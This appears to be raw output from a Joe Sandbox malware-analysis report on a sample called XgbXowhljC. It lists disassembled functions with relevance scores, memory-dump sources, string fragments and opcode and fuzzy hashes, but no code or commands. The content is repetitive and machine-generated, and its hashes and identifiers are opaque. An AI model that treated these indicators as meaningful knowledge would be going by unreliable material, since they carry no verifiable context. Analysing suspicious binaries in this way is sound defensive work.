                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000448000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000462000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000471000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_14_2_400000_XgbXowhljC.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: "$D]@$g
                                                                                        • API String ID: 0-2680357248
                                                                                        • Opcode ID: bdb62959b6a13f689e9e66de1d6557382f0ab51b5940c3833e91f8cd3ee150d2
                                                                                        • Instruction ID: 747b77d691e9adf450866458d98fc57aee54cc3503dfdc081857b001a99e6dcb
                                                                                        • Opcode Fuzzy Hash: bdb62959b6a13f689e9e66de1d6557382f0ab51b5940c3833e91f8cd3ee150d2
                                                                                        • Instruction Fuzzy Hash: 01820C75900218DFDB14DFA0DD88BDEBBB8FB48305F1085A9E50AB72A0DB745A89CF54
                                                                                        Function 00431FC0 Relevance: 3.9, Strings: 3, Instructions: 153COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000E.00000002.3403607078.000000000042B000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000411000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000413000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000415000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000417000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000437000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.000000000043F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000448000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000462000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000471000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_14_2_400000_XgbXowhljC.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: P(@$|Z@$|Z@
                                                                                        • API String ID: 0-1979765971
                                                                                        • Opcode ID: 0f4099ee454430e739349a48d0df1832bde3d3fb34f0e6cf12956163faa140cf
                                                                                        • Instruction ID: 775a2d37c965874c2ce4b691afe84a0770470b0689e2148d7c07e88400d90d81
                                                                                        • Opcode Fuzzy Hash: 0f4099ee454430e739349a48d0df1832bde3d3fb34f0e6cf12956163faa140cf
                                                                                        • Instruction Fuzzy Hash: 5761D4B5C01208DBDB00DFD0DA48BDEBBB8FB48305F10856AE556B72A4DBB45A49CF64
                                                                                        Function 00411001 Relevance: 2.7, Strings: 2, Instructions: 155COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000E.00000002.3403607078.0000000000411000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000413000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000415000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000417000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.000000000042B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000437000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.000000000043F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000448000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000462000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000471000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_14_2_400000_XgbXowhljC.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: <`@$|Z@
                                                                                        • API String ID: 0-3868924504
                                                                                        • Opcode ID: 9662126c2a3f4bce188696e4d4fe6a1fda1f55ff100a2e751a4ed470357ed78d
                                                                                        • Instruction ID: b1b00b43a5f693e32b7903b0add70f6b8c4bb62e61ae0248a843be21741c9fb7
                                                                                        • Opcode Fuzzy Hash: 9662126c2a3f4bce188696e4d4fe6a1fda1f55ff100a2e751a4ed470357ed78d
                                                                                        • Instruction Fuzzy Hash: 19610B75900218EFCB04DF94D998AEDBBB5FF48304F1081A9F60AB72A0DB745A89CF54
                                                                                        Function 00411010 Relevance: 2.7, Strings: 2, Instructions: 151COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000E.00000002.3403607078.0000000000411000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000413000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000415000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000417000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.000000000042B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000437000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.000000000043F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000448000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000462000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000471000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_14_2_400000_XgbXowhljC.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: <`@$|Z@
                                                                                        • API String ID: 0-3868924504
                                                                                        • Opcode ID: 9fe7e4887b8505bbf7ead8395dc4f923a8f06f276a629457ce9b4c7671ce9a66
                                                                                        • Instruction ID: 7e61d0d1989918ee1e00c8c8e38fefc994992c61de94b045daf328d51a29c78b
                                                                                        • Opcode Fuzzy Hash: 9fe7e4887b8505bbf7ead8395dc4f923a8f06f276a629457ce9b4c7671ce9a66
                                                                                        • Instruction Fuzzy Hash: F061FA75900218EFCB04DF94D998AEDBBB5FF48704F1081A9F60AB72A0DB745A89CF54
                                                                                        Function 004445A0 Relevance: 2.6, Strings: 2, Instructions: 83COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000E.00000002.3403607078.000000000043F000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000411000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000413000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000415000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000417000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.000000000042B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000437000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000448000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000462000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000471000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_14_2_400000_XgbXowhljC.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: |Z@$|Z@
                                                                                        • API String ID: 0-124865514
                                                                                        • Opcode ID: b6dd129b78f73b25a96a028b215454e2e9f8f28a047655896c3df963ff620192
                                                                                        • Instruction ID: 52819f41ef7503992d41f8823c9eeda36a72118c25b4084c4d8f41246021599f
                                                                                        • Opcode Fuzzy Hash: b6dd129b78f73b25a96a028b215454e2e9f8f28a047655896c3df963ff620192
                                                                                        • Instruction Fuzzy Hash: 7D3172B5610608DFE700DF91DA49BAE7BB4EB49704F20846DE502B72A0DF785E098F29
                                                                                        Function 004130A0 Relevance: 2.1, Strings: 1, Instructions: 861COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000E.00000002.3403607078.0000000000413000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000411000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000415000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000417000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.000000000042B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000437000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.000000000043F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000448000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000462000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000471000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_14_2_400000_XgbXowhljC.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: !
                                                                                        • API String ID: 0-2657877971
                                                                                        • Opcode ID: e3024d8349761fd659a3c91083f7e355ccfb0a25d86ee83c214a7fb45e784dc5
                                                                                        • Instruction ID: 6397878078cee6b0d663ee110a2eebbb201aa2a6cece41a6b768763cbc805268
                                                                                        • Opcode Fuzzy Hash: e3024d8349761fd659a3c91083f7e355ccfb0a25d86ee83c214a7fb45e784dc5
                                                                                        • Instruction Fuzzy Hash: 35921874A00228DFDB24DF54DD88BE9B7B5BB49301F1081EAE40AB7260DB745AC9CF59
                                                                                        Function 0043F006 Relevance: 1.8, Strings: 1, Instructions: 522COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000E.00000002.3403607078.000000000043F000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000411000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000413000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000415000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000417000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.000000000042B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000437000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000448000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000462000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000471000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_14_2_400000_XgbXowhljC.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 1
                                                                                        • API String ID: 0-2212294583
                                                                                        • Opcode ID: b707085db3473b331dc994d58f2eb0462968f3ed9081554dd581106a14c21cea
                                                                                        • Instruction ID: 1661dfd1d5e01c0f49a4b3382f6cc6f7f749f92b6b0ef522352a9251dbc0aabb
                                                                                        • Opcode Fuzzy Hash: b707085db3473b331dc994d58f2eb0462968f3ed9081554dd581106a14c21cea
                                                                                        • Instruction Fuzzy Hash: 22324C74900219DFDB14DFA4DE88BEEB7B4FB49301F1081A9E506B72A0DB745A89CF58
                                                                                        Function 0043F008 Relevance: 1.6, Strings: 1, Instructions: 362COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000E.00000002.3403607078.000000000043F000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000411000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000413000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000415000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000417000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.000000000042B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000437000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000448000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000462000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000471000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_14_2_400000_XgbXowhljC.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 1
                                                                                        • API String ID: 0-2212294583
                                                                                        • Opcode ID: d8b265e634e6bcded6a750abb8b29bf1516ef881e4f191a8527cbcb76b85b546
                                                                                        • Instruction ID: 01e58b8e0f49eb047338708d15ec0e644e3bdd24e5568d7edf336de559bee4eb
                                                                                        • Opcode Fuzzy Hash: d8b265e634e6bcded6a750abb8b29bf1516ef881e4f191a8527cbcb76b85b546
                                                                                        • Instruction Fuzzy Hash: 09F12D74A10204DFDB14DF94D988AEEB7B5FB49300F20816DE506BB2A4DB74998DCF58
                                                                                        Function 0043F022 Relevance: 1.6, Strings: 1, Instructions: 358COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000E.00000002.3403607078.000000000043F000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000411000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000413000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000415000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000417000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.000000000042B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000437000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000448000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000462000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000471000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_14_2_400000_XgbXowhljC.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 1
                                                                                        • API String ID: 0-2212294583
                                                                                        • Opcode ID: 7e4d569f1904df02700755ab4b53812668e6775ce1bfd5fd02050932d57da265
                                                                                        • Instruction ID: ffcb35cb98ec30e05d53578c63fc0d9345cfb2d2f89ad2537a51732294afad10
                                                                                        • Opcode Fuzzy Hash: 7e4d569f1904df02700755ab4b53812668e6775ce1bfd5fd02050932d57da265
                                                                                        • Instruction Fuzzy Hash: 10F12D74A10204DFDB14DF94DA88AEEB7B5FB49300F20816DE506BB2A4DB74998DCF58
                                                                                        Function 0043973F Relevance: .6, Instructions: 599COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000E.00000002.3403607078.0000000000439000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000411000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000413000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000415000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000417000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.000000000042B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000437000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.000000000043F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000448000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000462000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000471000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_14_2_400000_XgbXowhljC.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 86dd9598fc8faaaeb356f7f0f92ef192afe8694b605b5003d1fe91439091caaf
                                                                                        • Instruction ID: 9a40b0bf24ea6cb4ae40d29559a1899e88df5d17e1f8112cb79a4d4ad7f2bddf
                                                                                        • Opcode Fuzzy Hash: 86dd9598fc8faaaeb356f7f0f92ef192afe8694b605b5003d1fe91439091caaf
                                                                                        • Instruction Fuzzy Hash: 7352E775D0021C9BCB04DFE0DD98ADEB7B9BF48305F10816AE506BB264EB746A4ACF54

                                                                                        Non-executed Functions

                                                                                        Function 004457AE Relevance: 5.1, Strings: 4, Instructions: 125COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000E.00000002.3403607078.000000000043F000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000411000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000413000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000415000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000417000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.000000000042B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000437000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000448000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000462000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000471000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_14_2_400000_XgbXowhljC.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: >$\@$t@$t@
                                                                                        • API String ID: 0-397992017
                                                                                        • Opcode ID: 225b412783245aca56404577187fdc66cfeef12a48eb8ae7963c53f3af1f5494
                                                                                        • Instruction ID: 13dae8a5215eeeec8a14e986a5156b9e6c0ed5cbf05ba9de4d5f6b9e7b4519f8
                                                                                        • Opcode Fuzzy Hash: 225b412783245aca56404577187fdc66cfeef12a48eb8ae7963c53f3af1f5494
                                                                                        • Instruction Fuzzy Hash: 0251E6B4900219CFDB24CF55C949BD9B7B4BF48300F00C1EAE54AAB261E7B49E85DF94
                                                                                        Function 00411B2D Relevance: 5.1, Strings: 4, Instructions: 53COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000E.00000002.3403607078.0000000000411000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000413000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000415000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000417000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.000000000042B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000437000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.000000000043F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000448000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000462000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000E.00000002.3403607078.0000000000471000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_14_2_400000_XgbXowhljC.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 4$I$Xa@$da@
                                                                                        • API String ID: 0-1532661933
                                                                                        • Opcode ID: bbe8532c0ef7fa72b0b8c1af57e640edf96fb3d23b4325f7a6d44bacbcabbb12
                                                                                        • Instruction ID: c09f5cfb025f3c80594565b7053fb8fd6d3be653a6def5a09f27d7b98fa6e070
                                                                                        • Opcode Fuzzy Hash: bbe8532c0ef7fa72b0b8c1af57e640edf96fb3d23b4325f7a6d44bacbcabbb12
                                                                                        • Instruction Fuzzy Hash: D8210D75900108EBDB04DF90EA58ADEB7B9FF44305F10812AF606A7264DB346A4ACB59